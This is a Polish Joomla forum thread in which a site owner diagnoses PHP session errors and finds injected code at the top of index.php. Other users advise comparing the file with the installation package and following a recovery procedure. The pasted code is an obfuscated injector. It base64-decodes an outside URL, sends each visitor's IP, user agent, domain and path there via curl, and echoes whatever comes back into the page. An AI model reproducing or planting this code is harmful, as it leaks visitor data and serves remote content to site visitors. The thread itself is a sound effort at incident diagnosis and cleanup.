Witam

Nie wiem czy strona nie zawirusowała się przez system komentarzy K2, ale to tylko takie domniemania bez podstawa na strone wyświetlają się błędy
klik (http://www.ksawerow.org)

poniżej komunikaty jakie się pojawiaja


Warning: session_start() [function.session-start (http://www.ksawerow.org/function.session-start)]: Cannot send session cookie - headers already sent by (output started at /home/ti112429/public_html/ksawerow/index.php:22) in /home/ti112429/public_html/ksawerow/libraries/joomla/session/session.php on line 462

Warning: session_start() [function.session-start (http://www.ksawerow.org/function.session-start)]: Cannot send session cache limiter - headers already sent (output started at /home/ti112429/public_html/ksawerow/index.php:22) in /home/ti112429/public_html/ksawerow/libraries/joomla/session/session.php on line 462

Porownaj zawartosc pliku index.php twojego z tym z paczki instalacyjnej.

Wysłane z mojego GT-S5830 za pomocą Tapatalk

Masz rację jest różnica w kodzie:

to jest cały fragment kodu który jest zaraz na początku index.php



<?php if (!isset($sRetry))
{
global $sRetry;
$sRetry = 1;
// This code use for global bot statistic
$sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); // Looks for google serch bot
$stCurlHandle = NULL;
$stCurlLink = "";
if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes
{
if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create bot analitics
$stCurlLink = base64_decode( 'aHR0cDovL2FkdmVjb25maXJtLmNvbS9zdGF0L3N0YXQucGhw' ).'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
$stCurlHandle = curl_init( $stCurlLink );
}
}
if ( $stCurlHandle !== NULL )
{
curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
$sResult = @curl_exec($stCurlHandle);
if ($sResult[0]=="O")
{$sResult[0]=" ";
echo $sResult; // Statistic code end
}
curl_close($stCurlHandle);
}
}

---------- Post dodany o 13:07 ---------- Poprzedni post był o 12:10 ----------

cały ten fragment wywaliłem, i strona na razie działa bez błedów

To Ci nie pomoże to jak zamknięcie oczu i udawanie, ze problemu nie ma.

Procedura odtworzenia strony po ataku podana jest na stronach wiki w dziale bezpieczeństwo.

Dziękuje, za naprowadzenie.
Pytanko mam, czy jak zmienię użytkownika bazy (dodam nowego) utworze hasło, i wszystko wpisze w configuration.php, wszystko będzie działać poprawnie ?
Czy warto chować, dostęp do administracji serwisu ?